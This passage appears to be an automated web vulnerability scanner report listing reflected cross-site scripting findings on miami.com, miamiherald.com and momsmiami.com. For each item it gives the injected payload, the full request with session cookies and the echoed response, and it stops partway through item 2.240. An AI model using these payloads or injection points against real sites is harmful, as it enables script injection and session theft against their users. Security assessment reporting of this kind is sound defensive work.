<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20264501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|movies?6c6eb"-alert(1)-"029fda865f4=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.226. http://www.miami.com/movies/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /movies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 892e0"-alert(1)-"96ce8fc124 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /movies/?892e0"-alert(1)-"96ce8fc124=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:54:06 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:54:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:54:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69125

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
iyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20264501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|movies|?892e0"-alert(1)-"96ce8fc124=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.227. http://www.miami.com/nightlife [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /nightlife

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6577"-alert(1)-"5b0a69b1321 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nightlife?b6577"-alert(1)-"5b0a69b1321=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 73883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
ahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20267501";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|nightlife?b6577"-alert(1)-"5b0a69b1321=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.228. http://www.miami.com/restaurants [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /restaurants

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4407a"-alert(1)-"6f919770c59 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restaurants?4407a"-alert(1)-"6f919770c59=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:44:00 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 78130

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
oo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20262001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|restaurants?4407a"-alert(1)-"6f919770c59=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.229. http://www.miami.com/see-do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /see-do

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f9e5"-alert(1)-"44afdd7ab8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /see-do?7f9e5"-alert(1)-"44afdd7ab8e=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:43:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
miyahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20378001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|see-do?7f9e5"-alert(1)-"44afdd7ab8e=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.230. http://www.miami.com/shopping [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miami.com
Path:   /shopping

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c96d"-alert(1)-"25b0154ec80 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shopping?7c96d"-alert(1)-"25b0154ec80=1 HTTP/1.1
Host: www.miami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SESSb94d779c841b427b53c8b2d9f7cc1b71=q4sqn19gtgfthsl78d05dm8d31;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.37
Last-Modified: Sun, 14 Nov 2010 22:43:58 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 14 Nov 2010 22:44:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:44:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
...[SNIP]...
yahoo = {};
miyahoo.request_type="ac";
miyahoo.container_type="js";
miyahoo.tax_id ="20307001";
miyahoo.content_type ="fn_news";
miyahoo.cstm_sctn_list ="Section";
miyahoo.cstm_content_cat ="|shopping?7c96d"-alert(1)-"25b0154ec80=1";
miyahoo.slots = {};
miyahoo.slots.above_fold_300_by_100={};
miyahoo.slots.above_fold_300_by_100.ad_size_list=["300x100"];
miyahoo.slots.above_fold_300_by_100.ad_delivery_mode="ipatf";
miyahoo.slot
...[SNIP]...

2.231. http://www.miamiherald.com/reg-bin/tint.cgi [version parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.miamiherald.com
Path:   /reg-bin/tint.cgi

Issue detail

The value of the version request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1b7'%3balert(1)//6fc0ef752d5 was submitted in the version parameter. This input was echoed as 1f1b7';alert(1)//6fc0ef752d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reg-bin/tint.cgi?mode=edit&version=newsletter1f1b7'%3balert(1)//6fc0ef752d5 HTTP/1.1
Host: www.miamiherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mi__classads_featured=o7p1289710800;

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Mi-app-host: rdds008p
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 14 Nov 2010 22:53:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 14 Nov 2010 22:53:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41352

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>


<head>


<SCRIPT LANGUAGE="JavaScript">
<!--
var gomez={
   gs: new Date().getTime(),
   acctId:'D3FD89',
   pgId:'v-newsletter1f1b7';alert(1)//6fc0ef752d5',
   grpId:'Miami Herald'
};


var gomez=gomez?gomez:{};gomez.h3=function(d, s){for(var p in s){d[p]=s[p];}return d;};gomez.h3(gomez,{b3:function(r){if(r<=0)return false;return Math.random()<=r&&r;},b
...[SNIP]...

2.232. http://www.momsmiami.com/ [blog_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /

Issue detail

The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3350"><script>alert(1)</script>5cb7dc9a388 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a=profile&u=2&t=blog&blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:59 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=be2dd0fac0f368778f3c7248893a9bed; expires=Mon, 14-Nov-2011 22:54:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 40991


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog&amp;blog_id=3035d3350"><script>alert(1)</script>5cb7dc9a388">
...[SNIP]...

2.233. http://www.momsmiami.com/ [link_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /

Issue detail

The value of the link_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8219c"><script>alert(1)</script>62f20d5abff was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a=birthday_pages&link_id=298219c"><script>alert(1)</script>62f20d5abff HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:53:29 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:53:29 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=31ab67d680166369343db82ebda09a1e; expires=Mon, 14-Nov-2011 22:53:29 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11303


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- birthday -->
<!--
...[SNIP]...
<a href="/?a=email_birthday_party&amp;link_id=298219c"><script>alert(1)</script>62f20d5abff" title="Email a friend." rel="nofollow">
...[SNIP]...

2.234. http://www.momsmiami.com/ [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eaa2"><script>alert(1)</script>f0ceec3a72 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?a=profile&u=2&t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&blog_id=3035 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:18 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:18 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=5c7e56c99fdb3fbe7d618e18c775ce9b; expires=Mon, 14-Nov-2011 22:54:18 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog6eaa2"><script>alert(1)</script>f0ceec3a72&amp;blog_id=3035">
...[SNIP]...

2.235. http://www.momsmiami.com/forum/memberlist.php [blog_id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /forum/memberlist.php

Issue detail

The value of the blog_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51c09"><script>alert(1)</script>51fe99986e0 was submitted in the blog_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=347551c09"><script>alert(1)</script>51fe99986e0 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:55:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:55:41 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:55:41 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=ecca7e3c999e0c7d65e37d0d501e78b9; expires=Mon, 14-Nov-2011 22:55:41 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41069


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog&amp;blog_id=347551c09"><script>alert(1)</script>51fe99986e0">
...[SNIP]...

2.236. http://www.momsmiami.com/forum/memberlist.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /forum/memberlist.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c174"><script>alert(1)</script>28e9ec410ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum/memberlist.php?mode=viewprofile&u=2&t=blog&blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:56:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:56:00 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:56:00 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=01cb0feaece59c23a875621186d5dce9; expires=Mon, 14-Nov-2011 22:56:00 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41092


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog&amp;blog_id=/8c174"><script>alert(1)</script>28e9ec410ab3475">
...[SNIP]...

2.237. http://www.momsmiami.com/forum/memberlist.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /forum/memberlist.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7e94"><script>alert(1)</script>ee4ccd85f90 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /forum/memberlist.php?mode=viewprofile&u=2&t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&blog_id=3475 HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:55:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:55:21 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:55:21 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=1076c6eb78094a4ffd21ac7758d91d47; expires=Mon, 14-Nov-2011 22:55:21 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 50902


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blogd7e94"><script>alert(1)</script>ee4ccd85f90&amp;blog_id=3475">
...[SNIP]...

2.238. http://www.momsmiami.com/index.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /index.php

Issue detail

The value of the t request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84690"><script>alert(1)</script>3bc91134198 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?a=profile&t=blog84690"><script>alert(1)</script>3bc91134198&u=2&date=new HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:53:58 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:53:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:53:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=02be0ca3430688abfa7afa4a6f32257f; expires=Mon, 14-Nov-2011 22:53:59 GMT; path=/; domain=momsmiami.com; HttpOnly
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53829


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<!-- blogs -->
<!-- sta
...[SNIP]...
<a href="/?a=profile&amp;u=2&amp;t=blog84690"><script>alert(1)</script>3bc91134198&amp;blog_id=3475">
...[SNIP]...

2.239. http://www.momsmiami.com/view_photo.php [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.momsmiami.com
Path:   /view_photo.php

Issue detail

The value of the c request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a354"><script>alert(1)</script>f9d100f9d13 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /view_photo.php?c=8059a354"><script>alert(1)</script>f9d100f9d13&photo=1162&t=home&TB_iframe=true&height=600&width=730&modal=true HTTP/1.1
Host: www.momsmiami.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: phpbb3_o4oj7_k=; phpbb3_o4oj7_u=1; phpbb3_o4oj7_sid=72ca88ed4b4731c0e1975d5915fcbe53;

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 22:54:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: phpbb3_o4oj7_u=1; expires=Mon, 14-Nov-2011 22:54:44 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_k=; expires=Mon, 14-Nov-2011 22:54:44 GMT; path=/; domain=momsmiami.com; HttpOnly
Set-Cookie: phpbb3_o4oj7_sid=64b47022dec6026acb55b6f3b632c629; expires=Mon, 14-Nov-2011 22:54:44 GMT; path=/; domain=momsmiami.com; HttpOnly
Content-Length: 4260
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Ty
...[SNIP]...
<a href="/view_photo.php?c=8059a354"><script>alert(1)</script>f9d100f9d13&amp;photo=1123&amp;t=home">
...[SNIP]...

2.240. http://www.momsmiami.com/view_photo.php [t parameter]  previous  next

Summary

